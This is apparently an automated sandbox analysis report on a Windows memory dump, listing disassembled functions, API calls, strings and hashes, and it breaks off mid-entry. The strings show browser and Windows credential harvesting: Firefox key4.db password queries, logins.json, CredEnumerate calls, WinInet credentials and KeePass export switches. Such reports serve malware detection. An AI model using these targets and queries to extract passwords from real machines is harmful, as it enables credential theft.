                                          • Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040EA92, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                            • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                            • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                            • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                            • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                          • strlen.MSVCRT ref: 0040EAF0
                                          • strlen.MSVCRT ref: 0040EAFE
                                          • memset.MSVCRT ref: 0040EB3F
                                          • strlen.MSVCRT ref: 0040EB4E
                                          • strlen.MSVCRT ref: 0040EB5C
                                          • memset.MSVCRT ref: 0040EB9D
                                          • strlen.MSVCRT ref: 0040EBAC
                                          • strlen.MSVCRT ref: 0040EBBA
                                          • _strcmpi.MSVCRT ref: 0040EC68
                                          • _mbscpy.MSVCRT ref: 0040EC83
                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                          • API String ID: 3884059725-3138536805
                                          • Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                          • Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
                                          • Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                          • Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040CAFA, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                          • API String ID: 1439213657-1959339147
                                          • Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                          • Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
                                          • Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                          • Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00443AD1, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00443AF6
                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                          • strlen.MSVCRT ref: 00443B12
                                          • memset.MSVCRT ref: 00443B4C
                                          • memset.MSVCRT ref: 00443B60
                                          • memset.MSVCRT ref: 00443B74
                                          • memset.MSVCRT ref: 00443B9A
                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                          • memcpy.MSVCRT ref: 00443BD1
                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                          • memcpy.MSVCRT ref: 00443C0D
                                          • memcpy.MSVCRT ref: 00443C1F
                                          • _mbscpy.MSVCRT ref: 00443CF6
                                          • memcpy.MSVCRT ref: 00443D27
                                          • memcpy.MSVCRT ref: 00443D39
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$strlen$_mbscpy
                                          • String ID: salu
                                          • API String ID: 3691931180-4177317985
                                          • Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                          • Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
                                          • Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                          • Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F9AC, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                          • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                          • API String ID: 2449869053-232097475
                                          • Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                          • Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
                                          • Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                          • Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004092CB, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • sprintf.MSVCRT ref: 004092EC
                                          • LoadMenuA.USER32(?,?), ref: 004092FA
                                            • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                            • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                            • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                            • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                          • DestroyMenu.USER32(00000000), ref: 00409318
                                          • sprintf.MSVCRT ref: 0040935C
                                          • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                          • memset.MSVCRT ref: 0040938D
                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                          • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                          • DestroyWindow.USER32(00000000), ref: 004093CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                          • String ID: caption$dialog_%d$menu_%d
                                          • API String ID: 3259144588-3822380221
                                          • Opcode ID: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                          • Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
                                          • Opcode Fuzzy Hash: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                          • Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F928, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                          • API String ID: 667068680-3953557276
                                          • Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                          • Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
                                          • Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                          • Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004045D6, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                          • API String ID: 2449869053-4258758744
                                          • Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                          • Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
                                          • Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                          • Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F177, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                          • memset.MSVCRT ref: 0040F1BF
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                          • LocalFree.KERNEL32(?), ref: 0040F2A1
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                          • String ID: Creds$ps:password
                                          • API String ID: 551151806-1872227768
                                          • Opcode ID: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                          • Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
                                          • Opcode Fuzzy Hash: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                          • Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404217, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wcsstr.MSVCRT ref: 0040424C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                          • _mbscpy.MSVCRT ref: 004042B7
                                          • _mbscpy.MSVCRT ref: 004042CA
                                          • strchr.MSVCRT ref: 004042D8
                                          • strlen.MSVCRT ref: 004042EC
                                          • sprintf.MSVCRT ref: 0040430D
                                          • strchr.MSVCRT ref: 0040431E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                          • String ID: %s@gmail.com$www.google.com
                                          • API String ID: 3866421160-4070641962
                                          • Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                          • Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
                                          • Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                          • Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004094A2, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • _mbscpy.MSVCRT ref: 004094BA
                                          • _mbscpy.MSVCRT ref: 004094CA
                                            • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                            • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                            • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                          • _mbscpy.MSVCRT ref: 00409512
                                          • memset.MSVCRT ref: 0040952E
                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                          • API String ID: 1035899707-3647959541
                                          • Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                          • Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                          • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                          • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004106AD, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                          • API String ID: 714388716-318151290
                                          • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                          • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                          • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                          • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C750, Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                          • SelectObject.GDI32(?,?), ref: 0040C7EC
                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                          • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                            • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                            • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                            • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                          • LoadCursorA.USER32(00000067), ref: 0040C84E
                                          • SetCursor.USER32(00000000), ref: 0040C855
                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                          • SetFocus.USER32(?), ref: 0040C8B2
                                          • SetFocus.USER32(?), ref: 0040C92B
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                          • String ID:
                                          • API String ID: 1416211542-0
                                          • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                          • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                          • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                          • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040FA44, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strchr.MSVCRT ref: 0040FA5C
                                          • _mbscpy.MSVCRT ref: 0040FA6A
                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                            • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                          • _mbscpy.MSVCRT ref: 0040FABA
                                          • _mbscat.MSVCRT ref: 0040FAC5
                                          • memset.MSVCRT ref: 0040FAA1
                                            • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                            • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                          • memset.MSVCRT ref: 0040FAE9
                                          • memcpy.MSVCRT ref: 0040FB04
                                          • _mbscat.MSVCRT ref: 0040FB0F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                          • String ID: \systemroot
                                          • API String ID: 912701516-1821301763
                                          • Opcode ID: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                          • Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
                                          • Opcode Fuzzy Hash: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                          • Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406625, Relevance: 16.7, APIs: 7, Strings: 4, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • key4.db, xrefs: 00406632
                                          • C@, xrefs: 00406625
                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy$memcmpmemsetstrlen
                                          • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                          • API String ID: 2950547843-1835927508
                                          • Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                          • Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
                                          • Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                          • Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004019E9, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$strlen
                                          • String ID:
                                          • API String ID: 4288758904-3916222277
                                          • Opcode ID: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                          • Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
                                          • Opcode Fuzzy Hash: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                          • Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408458, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                          • wcslen.MSVCRT ref: 004084C2
                                          • _wcsncoll.MSVCRT ref: 00408506
                                          • memset.MSVCRT ref: 0040859A
                                          • memcpy.MSVCRT ref: 004085BE
                                          • wcschr.MSVCRT ref: 00408612
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                          • String ID: J$Microsoft_WinInet
                                          • API String ID: 1371990430-260894208
                                          • Opcode ID: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                          • Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
                                          • Opcode Fuzzy Hash: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                          • Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041025A, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                                          Download Yara Rule
                                          APIs
                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                          • memcpy.MSVCRT ref: 004102D6
                                          Strings
                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FromStringUuid$memcpy
                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                          • API String ID: 2859077140-2022683286
                                          • Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                          • Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
                                          • Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                          • Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406A1A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                          • strlen.MSVCRT ref: 00406A6A
                                          • _mbscpy.MSVCRT ref: 00406A7A
                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                          • _mbscpy.MSVCRT ref: 00406A94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                          • String ID: Unknown Error$netmsg.dll
                                          • API String ID: 2881943006-572158859
                                          • Opcode ID: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
